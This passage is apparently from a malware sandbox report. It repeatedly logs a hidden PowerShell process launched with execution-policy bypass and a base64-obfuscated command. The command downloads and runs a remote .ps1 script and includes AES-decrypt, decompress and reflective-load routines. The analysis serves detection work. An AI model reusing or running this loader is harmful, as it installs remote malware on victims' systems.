3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31md